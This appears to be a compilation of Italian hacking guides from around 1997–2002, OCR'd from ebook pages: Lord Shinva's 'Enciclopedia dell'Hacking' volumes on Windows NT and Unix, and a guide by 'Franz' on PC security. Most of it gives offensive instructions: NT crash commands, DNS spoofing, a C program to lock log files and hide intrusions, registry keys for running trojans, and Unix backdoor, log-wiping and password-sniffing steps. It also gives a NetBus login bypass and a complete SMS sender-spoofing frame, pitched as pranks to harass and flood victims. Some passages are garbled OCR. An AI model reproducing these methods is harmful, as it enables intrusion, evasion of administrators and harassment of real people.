QUESITO 11: Come faccio ad utilizzare il modo di trasferimento passivo sul 
server FTP se non e’ attivo? 


Se il server FTP utilizzato e’ quello di default (Microsoft), bastera® 
editare una key dei registry di Windows NT: 


System\CurrentControlSet\Services\MSFTPSVC\Parameters 
chiave: EnablePortAttack,REG_DWORD 


e abilitarla settandola a 1. 
QUESITO 12: Come trashare un sistema che utilizza NT ? 


Se lasciamo perdere i metodi "tradizionali" (lavorando sui file), eccone 
alcuni "alternativi" da far gustare al SysAdmin... 


Aprendo una connessione Telnet alla porta 53 del server e digitando una 
decina di caratteri a caso seguiti da invio, bloccheremo il DNS del server 
fino al riavvio del sistema... niente piu’ host name, solo IP address! 


Oppure magari vogliamo trasformare il suo Pentium II 233 Mhz in uno 8086 8 
Mhz? Niente di piu’ facile, basta collegarsi via Telnet (come sopra) alla 

porta 135. Se la porta risponde, facendo come nel caso del DNS, avremo 
rallentato del 100% la velocit... della CPU... 


E se poi il SysAdmin utilizza IIS Microsoft come Web server, una connessione 
alla porta 1031 gli fara’ passare la voglia di usare i programmi di Bill 

Gates. Oppure possiamo collegarci alla porta 80 e inviare "GET ../.." per 
crashare il tutto... 
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Per causare un riavvio improvviso del sistema o un crash (solo con NT 
inferiore alla versione 4.0 e NT senza Hotfix) si puo utilizzare una tecnica 
conosciuta con il nome di "Ping of Death". Si tratta di inviare un pacchetto 
ICMP enorme. Ecco cosa succedera: il server ricevera’ il pacchetto in forma 
frammentata, quindi sotto forma di moltissimi piccoli pacchetti. Quando 
tentera’ di riassemblarli, si avr... un buffer overflow e potranno accadere le 
cose piu’ disparate. Da Windows 95 e Windows NT basta digitare: 


ping -165527 -s 1 nomevittima 


L'attacco del SYN flood (o del FIN flood) implica un invio di una quantita” 
enorme di pacchetti forgiati con un IP address sorgente non esistente. 
Windows NT e’ vulnerabile fino alla versione 4.0 senza Hotfix. 


Infine, ad un piu alto livello, inviando ad un server NT 4.0 un semplice 
pacchetto DNS di risposta (senza che il server lo abbia richiesto), DNS 
crashera. 


Con il comando smbmount su Linux 2.0.28+ si puo’ inoltre causare un crash con 
errore di protezione su un server, eseguendo il comando: 


smbmount //vittima/servizio /mnt -U nomeclient 


Se il file ROLLBACK.EXE e? presente sul server (o se ce lo mettiamo noi...) 
possiamo eseguirlo e goderci lo spettacolo: i Registry verranno completamente 
azzerati. Inoltre, se blocchiamo una porta (ad esempio la 19, detta chargen) 

il server eseguira’ automaticamente ROLLBACK per cercare di risolvere il 
problema... 


Per chi poi conosce a fondo hacking e spoofing, la cosa piu’ divertente resta 
la forgiatura dei pacchetti DNS (di tipo UDP). 

Effettuando una richiesta DNS e utilizzando uno sniffer per intercettare i 
pacchetti di risposta e catturare i numeri ID di riposta DNS e’ possibile 
inviare falsi pacchetti DNS a un server in modo che chiunque chieda il suo 
IP address la risposta sia quella che desideriamo. In pratica, chiunque si 
colleghera’ a quel server si colleghera’ in pratica al server che vogliamo 
noi, dato dall'IP address che abbiamo inviato nel pacchetto "forgiato". 


Con questo metodo, applicato ad altri servizi, e’ possibile fare copie di 
tutte le email che transitano sul sistema, inibire l'accesso ai servizi, 
re-routing, e molto altro ancora. 


QUESITO 13: Come impedire a chiunque, anche al SysAdmin, di accedere a uno o 
piu file? 
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Ad esempio con questo programmino in C si puo bloccare un file per quanto 
tempo si desidera, passando (al programma) il nome del file da bloccare: 


#include <windows.h> 
void main(int ac, char *av[]) 
{ 
HANDLE fp; 
fp = CreateFile(av[1], FILE_READ_DATA, 0, 0, OPEN_EXISTING, 0, 0); 
if (fp == INVALID_HANDLE_VALUE) 


exit(GetLastError()); 
Sleep(60000) { tempo di bloccaggio espresso in: secondi * 1000 } 
exit(0); 


} 


A che puo servire bloccare un file? Beh, ad esempio, se blocchiamo un file 
di log per un'ora e hackeriamo il server per un'ora, il SysAdmin non ne 
sapra’ mai niente... 


QUESITO 14: Cos'altro si puo’ fare con i Registry? 


Troppo lungo da spiegare... come dico sempre, basta usare la fantasia... 
Comunque ci sono un paio di cosette ancora. Ad esempio, per effettuare 1l 
logging del PPP basta selezionare... 


HKEY_LOCAL _MACHINE\CurrentControlSet\Services\RasMan\PPP 
valore = Logging 
valore = REG_DWORD 
valore = 1 (settare questo valore) 


mentre per abilitare quello della seriale basta selezionare Parameters 
(anziche. PPP) come ultimo valore della key. 


Una cosa molto utile e’ la possibilita’ di eseguire le applicazioni che 
abbiamo inviato (troiani, ad esempio) e per farlo possiamo modificare una di 
queste due keys... 


HKEY_LOCAL _MACHINE\System\CurrentControlSet\Services\VXD 


aggiungendo una nuova key di tipo StaticVxd e inserendo il percorso completo 
dell'applicazione, oppure... 


HKEY_LOCAL _MACHINE\Software\Classes\txtfile\shelllopen\command 


per sfruttare il metodo delle associazioni (file di testo, in questo caso) 
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per eseguire la nostra applicazione. 


Il vantaggio della prima key e che l'applicazione verra’ eseguita a Ring-0 
(quindi con accesso completo sul sistema operativo e sulle sue risorse, anche 
a basso livello, su memoria, disco rigido, ecc). 


Buon hacking con NT... 


Copyright (C) 1997 by 
:: LORD SHINVA :: 


-Digital Alliance Confederation- 


VAI AL VOLUME 13 
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GÌ Lord Shinva 
e) -DiGITAL::ALLIANCE- 


C:0.N:F.E:D.E:R.A:T.i:0.N 
Enciclopedia dell' Hacking 
Volume 13 


VIRTUOSISMI TECNICI: PARTE 2 

Questo file conclude il capitolo iniziato nel volume 11, sulle tecniche 
avanzate di hacking su Unix (da leggere quando sarete piu' esperti). 
Alcune di queste tecniche sono abbastanza conosciute, mentre altre sono 
(relativamente) nuove. 


Ricordate sempre che: 


- fare del port surfing (connettersi via Telnet alle porte di un server 
per trovare vie d'accesso non controllate e informazioni utili) e 
studiare il funzionamento dei servizi leggendo le RFC presenti su Internet 
e’ utilissimo per scoprire molte vulnerabilita’ di un generico sistema; 
vi meraviglierete di quello che potrete trovare: outdial (collegamenti 
via modem che vi permettono di telefonare ovunque nel mondo, anche a casa 
vostra, digitando comandi standard Hayes direttamente nel modem del 
server che state hackerando), liste di informazioni sulla struttura 
interna del network (come nel caso della porta 15, detta "netstat"), 
possibilita’ di manipolare un servizio per fare le cose piu’ disparate 
e attacchi all'integrita’ del sistema, per dirne qualcuna... 


- installare una backdoor e’ spesso necessario: anche se al momento il 
SysAdmin non sa della vostra presenza, prima o poi se ne accorgera’ ed 
eliminera’ il vostro account; inoltre dai log potrebbe risalire al modo 
in cui siete "entrati" nel sistema, e correggere il problema: in tal caso, 
installare una backdoor preventivamente (cancellando le tracce di ogni 
operazione come descritto in uno dei precedenti volumi) e’ indispensabile; 


Ecco altri consigli piu o meno avanzati: 


- nascondetevi da utmp e dai comandi come "who" utilizzando il programma 
incluso in uno dei precedenti volumi, in modo che nessuno potra’ notare 
la vostra presenza del sistema (per maggior sicurezza collegatevi di 
notte o al mattino presto); 


- manipolate 1 file .rhost per poter accedere senza restrizioni da remoto; 
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- se siete in grado di programmare e conoscete *bene* Unix, potete 
installare delle nuove chiamate di sistema che svolgano le operazioni che 
vi servono (una per la gestione dei file e dei loro permessi, una di 
riserva per l'esecuzione shell, e così’ via) e disabilitare 1 controlli 
per l'accesso root al sistema, manipolando la kernel (argomento troppo 
complicato per poter essere spiegato in questi volumi); 


- se avete accesso in scrittura a /dev/kmem cambiate il vostro userid; se 
invece avete solo accesso in lettura, scrivete un programmino in C che 
intercetti le sessioni degli altri terminali (TTY) per intercettare le 
password degli altri utenti; 


- modificate i permessi d'accesso dei file piu’ interessanti, come /dev/mem 
e copiate la shell /bin/sh nella vostra directory utente, in una directory 
nascosta (oppure un .term) sotto falso nome e create degli script SUID; 


- editate gli script (.login .profile .cshrc ecc...) per installare troiani; 


- controllate se esistono password nel file .netrc (potrebbero esservi 
utili per accedere ad altri account); 


- provate sempre ad utilizzare i programmi in modo "non previsto" ;) per 
trovare nuovi bugs: scrivendo !/bin/sh nella schermata di un comando come 
"more" o "man", ad esempio, potreste riuscire ad accedere alla shell... 


- fate lo stesso con le chiamate di sistema, passando loro parametri non 
previsti; 


- controllate i file system utilizzando il comando showmount e state attenti 
al permessi... potreste trovare intere partizioni accessibili a chiunque! 


- controllate l'esistenza dei seguenti bugs: 


Ipr -r nomefile stampera® il file e lo cancellera’ (utile in 
caso di file per i quali non avete permessi) 
su username -c /bin/sh dara’ accesso a /bin/sh all'account username 
- esplorate i file SUID utilizzando il comando: 
find / -perm -6000 -1s 
per accedere a uno di essi, basta utilizzare il comando "In" per creare un 


link al file interessato, con il nome "-1", e quindi eseguire il link così 
creato; 


file:///D/FILE%20CONDIVISI/EBOOK-GUIDE-CORSI-M...]%20Enciclopedia%20di%20Lord%20Shinva/VOL13.HTM (2 di 3)09/11/05 17.39.22 


vol13 


- eliminate SEMPRE le vostre tracce e prendete ogni precauzione nel 
collegarvi e nel fare qualsiasi cosa: questo vale tanto per un semplice 
provider che per un mainframe del Pentagono (forse un po di piu in 
quest'ultimo caso... ;) 


Un buon metodo per trovare informazioni di ogni tipo (username e password di 
altri utenti - anche di root, se siete fortunati - posta elettronica di altri 

e intere sessioni di chat, per citarne alcune) e creare un programmino in C 

che allochi quanta piu memoria possibile, e poi cercare nel blocco allocato 
(oppure salvare l'intero blocco e scaricarselo per controllarlo con piu 

calma). 

Cio” che accade e’ questo: per soddisfare la vostra richiesta di spazio in 
memoria, il sistema mettera’ a disposizione quella usata in precedenza dalle 
altre applicazioni, senza pero” preoccuparsi di ripulirla! =) 


Copyright (C) 1997 by 
:: LORD SHINVA :: 


-Digital Alliance Confederation- 


TORNA ALLA HOME 
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PROTEGGI IL TUO PC By Franz! my e-mail franzthehacker@libero.it 


DEDICO QUESTA BREVE GUIDA CHE SPAZIA FRA VARI TEMI AGLI AMICI E FRATELLI DEL 
GRUPPO WWW.ZEROHACK.IT e WWW.HACKERALLIANCE.NET DI CUI FACCIO PARTE 
USATELA CON ATTENZIONE 


Ho pensato di chiamare cosi’ questa mia dissertazione sulla sicurezza e sul mondo di Internet in generale anche se in 
realta’ e’ un testo abbastanza semplice e descrittivo su quanto si puo’ effettuare/realizzare in qual vasto mondo o hard 
disk virtuale per come lo vedo io che è Internet. Tralasciamo le solite banalita” su com 'e’ nata Internet (collegamento in 
dati fra le maggiori reti di calcolo delle Universita” Americane hehe non ho resistito) e partiamo. 


Con l’aumentare delle connessioni ed accessi gratuiti ad Internet, è anche aumentato il numero degli “smanettoni” e dei 
curiosi, che per un motivo o per un altro, cercano di sfondare i sistemi di protezione ed accedere ai computer altrui. E” 
sbagliato ritenere che siano solo i grossi server a subire queste intrusioni, sono in aumento anche gli attacchi verso i PC 
domestici, o le piccole reti, la cui protezione spesso lascia a desiderare. Peggio ancora possono essere utilizzati come 
ponte, una volta sfondate le loro protezioni possono essere utilizzati verso altri “bersagli” facendo in modo che il vero 
attaccante resti sconosciuto. Queste intrusioni sono ancora piu’ verosimili con il diffondersi di connessioni tipo ADSL, 
con tariffa flat (connessione permanente ad internet) cosi’ l’utente domestico, che non si preoccupa mai della sicurezza, 
ritiene di non essere il possibile bersaglio di una intrusione...presunzione che paga dopo aver sperimentato di persona la 
stessa. 

Facciamo un passo indietro..al 1998 quando il trojan back orifice non era ancora marcato come tale dagli antivirus ed 
era diffusissimo (ancora oggi per chi non si e’ munito di un antivirus e’ a rischio). Bastava eseguire uno scan delle porte 
su un range di 255 indirizzi di un qualsiasi provider nazionale per trovare una media dai 3/4 pc infetti. Se back orifice 
fosse stato rilasciato oggi quali sarebbero i risultati? Devastanti! Comunque anche oggi la diffusione dei virus tramite 
posta elettronica mette in ginocchio aziende anche di grandi dimensioni. E’ nata l’era dei Worm, quelli che si 
autoeseguono con il semplice preview della posta elettronica (grazie anche ad outlook di Microsoft) e si autospediscono 
in allegato a tutti gli indirizzi presenti in rubrica. 


I FIREWALL 


Tradotto letteralmente significa “Muro Antincendio”. Si intende in realta’ un dispositivo hardware o software in grado 
di filtrare i protocolli ammessi o non ammessi in entrata o in uscita in rete, bloccare determinate porte o consentire il 
passaggio tramite alcune determinate dal gestore della macchina in questione. Inoltre normalmente tali firewall 
generano dei log (report) in grado di identificare come, quando e tramite quali porte e’ stato effettuato 
l’attacco/intrusione. 


É: Norton Personal Firewall Event Log 


11.14.39 
11.13.10 Unusedportblocking has blocked communicati... 
11.13.07 Unusedportblocking has blocked communicati... 
11.08.29 Unusedportblocking has blocked communicati... 
11.08.26 = Unusedportblocking has blocked communicati... 
11.08.03 = Unusedportblocking has blocked communicati... 
11.08.00 Unused portblocking has blocked communicati... 
13/12/01 11.04.47 Unused port blocking has blocked communicati... 
id 13/12/01 11.04.44 Unused port blocking has blocked communicati... 
ii 13/12/01 11.03.15 Unused port blocking has blocked communicati... 
id 13/12/01 11.03.12 Unused port blocking has blocked communicati... 
fa 13/12/01 11.03.02 Unused port blocking has blocked communicati... 
fia 13/12/01 11.02.59 Unused port blocking has blocked communicati... 
ii 13/12/01 11.00.48 Unused port blocking has blocked communicati... 
11.00.45. Unusedportblocking has blocked communicati... 
11.00.02 Unused portblocking has blocked communicati... 
10.59.59 — Unusedportblocking has blocked communicati... 
10.55.32 Unusedportblocking has blocked communicati... 
10.55.29 Unusedportblocking has blocked communicati... 
10.53.13 = Unusedportblocking has blocked communicati... 


Esempio di log di un firewall eseguito su una LAN (rete locale aziendale) 


Nel caso di un utente domestico la miglior scelta economica e’ senzaltro quella di un firewall di tipo software, 
convenienti anche in quanto sono abbastanza efficaci relativamente alla privacy durante la navigazione intesi come 
blocco dei cookie, e-mail del navigatore etcc. 


LA SICUREZZA NELLE E-MAIL 


La rete internet e’ costituita da milioni di nodi, i dati transitano da uno all’altro prima di arrivare a destinazione, cosa 
succederebbe se qualcuno si mettesse “in ascolto” su uno di questi nodi” Esistono molti modi per mettersi in ascolto, 
quello piu’ semplice e’ costituito da un semplice Sniffer, un programma software utilizzato per monitorare le reti in caso 
di problemi, ma che puo” essere utilizzato anche per “altri’ scopi, come in questo caso citato. In realta’ esistono molti 
tipi di Sniffer sia hardaware che software (Carnivore, Echelon solo per citare i piu’ famosi) 


deviato dall'1SP N 
E pusito di 
koneno dell'FBI 


Esempio di come funziona il SW di Carnivore 


Figura 1 


Collegamento 
telefonico 


L'architettura di Carnivore, così com'è stata ricostruita 
da uno studio tecnico indipendente autorizzato dal 
Dipartimento di Giustizia degli Stati Uniti 


Esempio 2 di come Carnivore e’ stato realizzato negli USA 


Il “Vero” nome di Carnivore e’ DCS 1000 al cui acronimo 1’FBI dice che non ha alcun significato, e’ uno strumento 
passivo. Raccoglie informazioni, ma non interagisce con il Network ne’ invia dati in rete. Larchitettura come illsutrato 
nelle precedenti figure, comprende un sistema di controllo monodirezionale (dalla rete a Cernivore), che intercetta il 
flusso dati, un computer collocato presso il provider con funzioni di filtro che raccoglie i dati, un collegamento 
telefonico criptato via modem su una linea riservata, uno o piu’ computer remoti per il controllo della raccolta dati e 
l’esame dei risultati. Il filtro e° molto sofisticato e permette di isolare i dati secondo diverse chiavi: indirizzo IP, 
protocollo utilizzato (qualunque Http, FTP, Https, Smtp, Pop3, Imap, Ccmail, etc). Per capire meglio ecco di seguito 
una schermata di settaggio di Carnivore (inedita hehe). 


Inoltre esiste documentazione del governo Americano in cui si autorizza l’uso di strumenti di intercettazione come 
questi, ecco di seguito un documento declassato da Top Secret dell’FBI. 


To: Finance Division Froa: Information Resources 
Re: (VU) 268-HQ-1217551, 07/11/1997 


The Ne 
tasked to di, based networks for several operations. 
DI has been insta in mass quantities trsagna the 
b? community. It is still be deployed În industry as 2 
point-to- int network technology. should be in use well 
pie” into the etare. . 


to itself. physicaliy the ONNIVORE system is a desktop Pc. Its 
operating systen is Solaris x.46 with a network interface card 
matching interceptod. 


{ Tha ONNIVORE systen prosentiy intercepts IP 

ets o LEN IP sdiress ar in tha case of the simple 

» nai) transport protocol it triggers on a known user nane. The 
enhancements being requested are to expond the trigger ing 
capabilities of OMNIVORE to Include real-time IP assignnonts. mt 
is fairly routine that ISPa allocate IP addresses dynamically. 


{U) the enclossd 50 gives a broad scope of the tasks 
to be completed for tnis development. The enclosed requisition 
is to fund this effort. 


qu) mnis contract effort will use the “attica? 


Tal cations Support Contract II. Contract officer 
4e-! is assigned to this contract. 


bX-1A P ‘am manager {er this effort is Misstranies 
Engineer Project leader for this 
. Vetfort is spun ace 


Documenti top secret su Carnivore declassificati dall’Fbi 


Mentre per quanto ri 
guarda Echelon mi limi , . & i 
a mi limitero’” a darvi una “Parziale” mappatura della struttura conosciuta 


Po di ascolto 2) Satelliti di telecomunicazione Ù Satelliti di signal intelligence 
où 
A: 


Yakima Firing Center 


Geraldton Station 
o Bc, 


Parziale ricostruzione della rete d’intercettazione di Echelon 


Per tornare al discorso relativo alla posta elettronica il modo migliore di garantirsi la riservatezza consiste nell’utilizzare 
dei sistemi di cifratura, il piu’ conosciuto e’ PGP. Ha avuto maggior diffusione grazie alla disponibilita’ del codice 
sorgente, della distribuzione freeware ed alla sicurezza degli algoritmi di cifratura. Il programma e’ reperibile presso 
www.nal.com 


IL DENIAL OF SERVICE 


Con questo acronimo si intende un attacco il cui scopo e’ quello che prevede un attacco che provochi l’interruzione 
delle funzioni di un sistema (consultazione pagine web, posta elettronica, upload tramite ftp). Come si capisce lo scopo 
non e’ quello di acquisire privilegi di un certo livello sulla macchina attaccata, quanto quello di impedire ad essa di 
funzionare. Tuttavia, questi attacchi potrebbero essere concepiti per penetrare una macchina: un DoS che non permetta 
allo Stack Tcp/Ip di rispondere ad un determinato pacchetto puo’ essere uno strumento di base per un’intrusione tentata 
in un momento successivo. I DoS sono di vari tipi alcuni agiscono su errori di programmazione o configurazione (i 
buffer overflow in lettura causati dalla gestione non appropriata del parsing, input scelti dall’utente che si realizzano 
nell’esecuzione continua di parti di codice o nella mancanza di time-out su alcune operazioni). Ve ne sono altri invece 
cheper la natura stessa dei sistemi verso i quali sono rivolti non possono essere fermati. 


ker Router Router Attacker 


STACK TCP/IP, WINNUKE, SPOOFING 


Negli ultimi anni si e’ assistito ad un moltiplicarsi di attacchi di DoS che colpiscono gli Stack Tcp/Ip dei sistemi 
operativi: molti ricorderanno nomi come WinNuke, Land, TearDrop. Per questi tipi di attacchi esistono in rete molti 
programmi gia’ pronti per l’uso. Le probabilita’ che l’attaccante venga individuato sono contenute perche’ i punti deboli 
del sistemapossono essere sfruttati servendosi di pacchetti con un indirizzo source falso (spoofing). Si tratta di DoS che 


Un altro Dos Famoso e? il Syn Flood. Il Syn e’ il pacchetto iniziale di una connessione Tcp/Ip: quando questo viene 
diretto verso una porta in ascolto, riserva una parte delle risorse a una nuova connessione possibile. L’attacco consiste 
nel lo spedire una grande quantita’ di pacchetti Syn che arrivano da un sorgente non in grado di resettare il Syn/Ack 
(acknoledge del pacchetto Syn ovvero l’ok ricevuto). Che ricevera’ in risposta al Syn. Così’ facendo il sistema 
attaccato continuera’ a riservare risorse per ogni pacchetto di Syn ricevuto fino ad andare in crash. Questo attacco puo” 
essere bloccato mediante dei firewal che ad esempio se si volesse limitare il numero di connessioni in base all’IP 
sorgente, ma si potrebbe neutralizzare ricorrendo allo spoofing (modificando ad ogni pacchetto di Syn l’IP sorgente). 


SERVER 


INTERNET 
(all’esterno del firewall) 


RETE PRIVATA 
(all’interno del firewall) 


Un altro tipo di attacco si basa sul concetto di amplificazione: un amplificatore e’ un sistema targhet che risponde ad un 
pacchetto “spoofabile” di una certa dimensione con un pacchetto di dimensioni maggiorie con una ‘sottorete’ che 
rispondono contemporaneamente ad un solo pacchetto. L'esempio tipico e’ lo Smurf . L’attaccante esegue uno Spoofin 
utilizzando come IP sorgente, quello del sistema attaccato o spedisce un Icmp di echo-request sull’indirizzo di una rete 
mal configurata. Tutti i targhet e la sottorete risponderanno contemporaneamente allo stesso pacchetto, ma le risposte si 


auto-indirizzeranno verso il targhet. Detta in poche parole con un attacco spedendo 10 Kb/sec. si puo’ raggiungere una 
potenza di 1000 Kb/sec. 


I Dos distribuiti DdoS 


Sono decisamente i piu’ temibili, in quanto originati da molti sistemi verso un unico targhet, questo consente di 
aumentare la portata dell’attacco e prendere di mira dei sistemi targhet di dimensioni notevoli. 

La struttura e’ cosi’ costituita: la postazione di controllo, gli host (i sistemi remoti controllati) e il targhet. 

Si puo’ prevedere che i pacchetti dalla postazione di controllo passino per pacchetti “spoofati”’ per rendere piu’ 
difficoltosa la ricerca della postazione di controllo. Alcuni DoS sono basati su caratteristiche del protocollo Tcp/Ip, 
mentre i DoS che si basano su un ingente numero di connessioni sono impossibili da evitare. Se lo Spoofing fosse 
impossibile molti problemi no ci sarebbero, e’ per questo che molti Isp hanno settato delle regole anti-spoofing in uscita 
sui loro router. Attualmente l’unico rimedio e’ quello di impiegare maggiori risorse per ottenere il medesimo effetto. 


INTRUSIONI 


Programmi di messaggistica chat come ICQ o client IRC vengono erroneamente a volte interpretati come possibili vie 
di intrusione sul proprio pc. I SW in questione non contengono bugs di questo tipo, in realta” e’ che hanno la possibilita’ 
di ricevere dei files eseguibili che nascondo dei tools di amministrazione remota (come back orifice, netbus, etc). 
L’individuazione e la rimozione di tali trojan sono abbastanza semplici, con un semplice antivirus aggiornato con le 
firme piu’ recenti oppure mediante dei kit di rimozione messi gratuitamente a disposizione delle stesse aziende 
produttrici di SW antivirus. I sistemi Unix sono decisamente vulnerabili in forza dei servizi di rete presenti e attivi, 
backdoor lasciate aperte dai programmatori diventano la miglior via di intrusione, utilizzando Password Cracking (un 
programma che cerca le password di un account esistente), CronJob, Rhosts ++ Backdoor (per modificare le 
autorizzazioni di pc connessi a una Lan) o Rootkit (cerca password,nasconde il funzionamento di processi in corso, 
cancella i log nasconde cartelle o file). 


I TROJAN 


Il piu’ famoso e’ sicuramente Netbus, creato dai Cult of Dead Cow, e’ disponibile per win 95/98/NT permette una serie 
di giochetti da remoto come aprire e richiudere il lettore cd-rom, inviare messaggi via IRC, etcc. Per comunicare usa il 
protocollo Tcp/IP usando le porte 12345 e 12346, per verificare se e’ presente su un pc basta digitare il netstat dal 
prompt del dos, oppure tentare una sessione telnet sulla porta 12345 del local host. Se fosse presente si avrebbe una 
striga del tipo “Netbus 1.53 o Netbus 1.60x sarebbe mostrata alla connessione. E’ prevista la possibilita’ di bloccare 
l’accesso al server tramite una password anche se in questa modalita’ c’e un bugs del programma per il quale basta 
digitare come password “password;1;password” alla richiesta di login e si e’ dentro. Un altro trojan meno noto e’ 
Master’s Paradise per Win 95/98, la sua strategia e’ quella di fondersi con programmi esca (sempre .exe). Al pc infetto 
viene sovrascritto il file SysEdit nella cartella c:\windows\system. 


SMS SPOOFING 


Come tutti sanno, gli SMS sono quei simpatici agglomerati di 160 caratteri che vagano per la rete GSM. Allegri, teneri, 
cattivi, pesanti o rompikazzo, questa massa di bit entra sempre piu' spesso nella nostra vita. La gente normale si 

fida degli sms. 

Se arriva un messaggio da "MARCO CELL" allora significa che sicuramente l'ha inviato il cellulare di Marco. Ma ne 
siamo cosi' sicuri? Esiste il modo di contraffare il numero del mittente di un SMS? La risposta (che potete gia' 

intuire dal titolo) la troverete nelle prossime righe. 


Ma prima parliamo un po' delle conseguenze. Cosa si puo' fare con un SMS spoofato ovvero con un sms con il numero 
del mittente scelto da noi? Il fatto che normalmente sia impossibile modificare il numero sorgente di un messaggio 
trasforma tutto quello che arriva attraverso un sms in oro colato. Situazione: due conoscenti, preferibilmente facili 
all'inkazzatura, e due cellulari. A ciascuno dei due mandate un messaggio con il numero dell'altro come mittente e con 
scritte sopra le peggiori offese che vi vengono in mente. Risultato: i due si scanneranno telefonicamente per circa un'ora 
e poi dovrete intervenire per spiegare lo scherzo, perche' rischierete che si degeneri nella rissa, visto che tutti e due 
penseranno che sia l'altro a fare il coglione. Ma questo e' uno scherzetto banale. Una cosa un po' piu' cattiva e' prendere 
come vittima una bella coppietta... quelle che sono solite mandarsi tanti sms teneri e sdolcinati... e spedire a uno dei due 
con il num dell'altro una bella frase presa dal peggiore film porno amatoriale. Oppure se un vostro amico ha 

Omnitel, mandare un messaggio dal numero 2010 con scritto "Addebito SMS L 124000", sul momento vi assicuro gli 
viene un colpo al cuore. 


Passiamo alla parte tecnica. Spesso gli operatori di telefonia mobile offrono il servizio di invio sms tramite appositi 
SMS-Gateway raggiungibili via modem. Sono la stessa cosa dei vari servizi presenti su internet, solo che in questo caso 
non devi compilare una form web, ma ti colleghi via telefono e ottieni il servizio attraverso un protocollo di 
comunicazione. E' un'attimo un piu' laborioso, c'e' da fare una telefonata e utilizzare un programma adatto, pero' questo 
sistema ha diversi vantaggi che cerchero' di spiegare. 


Cerchiamo prima di tutto di dare un'occhiata al protocollo usato in queste occasioni. 

Da quello che ho potuto vedere se ne usano principalmente due: il TAP e l'UCP. L'UCP e' piu' rapido e intuitivo. In 
sintesi nel protocollo UCP (Universal Computer Protocol... che nome micidiale) si 

invia una trama formattata in questo modo: 


<STX> HDR DATA CRC <ETX> 

dove <STX> e <ETX> sono 1 caratteri di start-stop rispettivamente 02h e 03h. 
L'header (HDR) contiene alcuni sottocampi separati dal carattere '/' 
TRN/LNG/OR/OPN 


TRN [2 NUMERIC CHAR] e' il numero della transizione (casuale) e varia 
fra 0 e 99 
LNG [5 NUMERIC CHARI la lunghezza della trama ovvero quanti caratteri ci sono 
fra <ETX> e <STX> 
OR [1 CHAR] puo' essere il carattere 'O' che indica la richiesta di 
servizio o il carattere 'R' che indica risposta a una 
richiesta 
OT [2 NUMERIC CHAR] e' il codice dell'operazione richiesta ed e' il parametro 
piu' interessante. 


La lista dei servizi e' elencata (come del resto tutti gli altri parametri tecnici) nel doc di definizione del protocollo UCP 
che e' compreso nel documento "ETS 133-3" prodotto dall'ETSI, ovvero l'ente che in europa si occupa di gran parte 
degli standard in materia di telecomunicazioni. 


I servizi piu' interessanti alla fine pero' sono due: lo 01 e lo 02. 


01 Invio di un singolo SMS 
02 Invio di un SMS multiplo 


Esempio di header 01/00020/0/01 
Il campo DATA varia da servizio a servizio. Per lo 01 e' composto da questi sottocampi: 
AdC/OAdC/OAC/MT/AMsg 


AdC [STRING OF NUM CHAR] E' il numero del destinatario del messaggio 
visto che di solito i gateway sono fuori dall'italia 
il numero e' meglio scriverlo ad esempio come: 
0039347000000 dove 0039 e' sempre presente 
OAdC [STRING OF NUM CHAR] E qui casca l'asino! Questo e' il numero sorgente 
del messaggio! Qui potete metterci qualsiasi serie 
di caratteri fra 0 e 9. Anche tipo 666 o 123456 o 
0000000. 
Se pero' notate i messaggi autentici indicano il 
numero del mittente come +39ecc. Purtroppo il '#' 
non si riesce a mettere e i vostri messaggi al 
massimo possono arrivare da un 0039ecc. 
OAC [STRING OF CHAR] Codice di autentificazione del mittente. Non so a 
che cazzo serva. Va lasciato in bianco. 
MT [I NUM CHAR] Tipo di messaggio. Qui va messo sempre 3 che indica 
un messaggio alfanumerico. 
AMsg [STRING OF CHAR] Il messaggio vero e proprio. 


Per l'AMsg va fatta una piccola digressione. Il testo non e' scritto in chiaro, ma va codificato in stringhe IA5. Sembra 
una cosa cazzuta, invece semplicemente si tratta di scrivere i caratteri con la loro codifica ascii invece che in chiaro. 
Questo perche' quei pippaioli degli ingegneri che hanno redatto il protocollo volevano inserire un controllo di errore in 


piu' visto che per inviare un carattere così' bisogna mandarne due. 


Cosa forse inutile, visto che l'ultimo campo CRC e' un controllo di errore. Questo paramentro sono due caratteri che 
costituiscono un numero in esadecimale. Il numero si ottiene prendendo le ultime due cifre significative (esadecimali) o 


della somma di tutti i caratteri che compongono header e data. 
Ecco la procedura che fa questa somma 


void UCP_generate_ checksum(char *buf, char *crc) 


{ 
char *ptr; 
int Ji 
j=0; 
for (ptr = buf; *ptr != '\0'; ptr++) 
{ 
j+= *ptr; 
if (f >= 256) 
î j-= 256; 
} 
} 


sprintf(cre,"%02X", j); 


Dunque se noi volessimo mandare un sms al numero 0039347123456 da numero 666 con testo "Satana ti vede" ecco 
cosa dovremmo comunicare al nostro gateway di fiducia. 


<STX>01/00066/0/01/0039347123456/666//3/536174616E612074692076656465/F6<ETX> 
E | HEADER | DATA (Satana ti vede)lCRC|-- 


Se la nostra query e' stata accettata il gateway rispondera piu' o meno cosi' 
<STX>01/00045/R/01/A/0039347123456:090800114008/A0<ETX> 


la vostra richiesta e' in questo momento nello stack del server che dopo poco la inoltrera' alla rete GSM che la smistera' 
fino alla stazione base a cui e' collegato il cellulare del destinatario dove verra' sparato via etere. Tutto questo nel giro di 
10 secondi se non ci sono intasamenti nel gateway o nella rete GSM. 


Ma come vi ho accennato c'e' anche un servizio 02 che e' molto interessante. Dipende da gateway a gateway, solo alcuni 
ve lo lasceranno usare visto che e' un'opzione che impiega parecchie risorse. Se e' attivo avete infatti la possibilita' di 
inviare fino a 20 sms in un'unica botta, ovvero il famoso sms multiplo. Inviare lo stesso messaggio a 20 persone diverse 
puo' essere utile? Non lo so,ma si possono fare tante cose divertenti. Esempio. Prendete una lista di 20 numeri di cell fra 
amici e conoscenti possibilemente singles. Prendete un vostro amico a cui volete fare un scherzo. Mandate un sms 
multiplo ai 20 numeri con numero sorgente il cell della vittima e con scritto: "Un nostro 

amico comune mi ha dato il tuo numero. Mi piaci molto e vorrei conoscerti. Ti dice qualcosa il 3 luglio ?" Nonostante il 
3 luglio non sia successo niente io sarei comunque curioso di sapere chi e' questo soggetto/soggetta e chiamerei il 
numero. Ma chi chiamo in realta'? Il numero della vittima ignara di tutto che si subisce 20 telefonate nel giro di pochi 
minuti! Dunque cosa ho ottenuto... un sms smurf!! :)) Veramente troppo divertente. 


Se invece vogliamo fare piu' una cosa da DoS puro invece di mandare al gateway una lista di 20 numeri diversi, 
mandiamo un sms multiplo con 20 numeri tutti uguali. Cosa succede? Il gateway non si accorge che i numeri sono tutti 
uguali e piazza nello stack tutti i messaggi insieme senza attese. In circa 1 minuto il cellulare della vittima verra' 
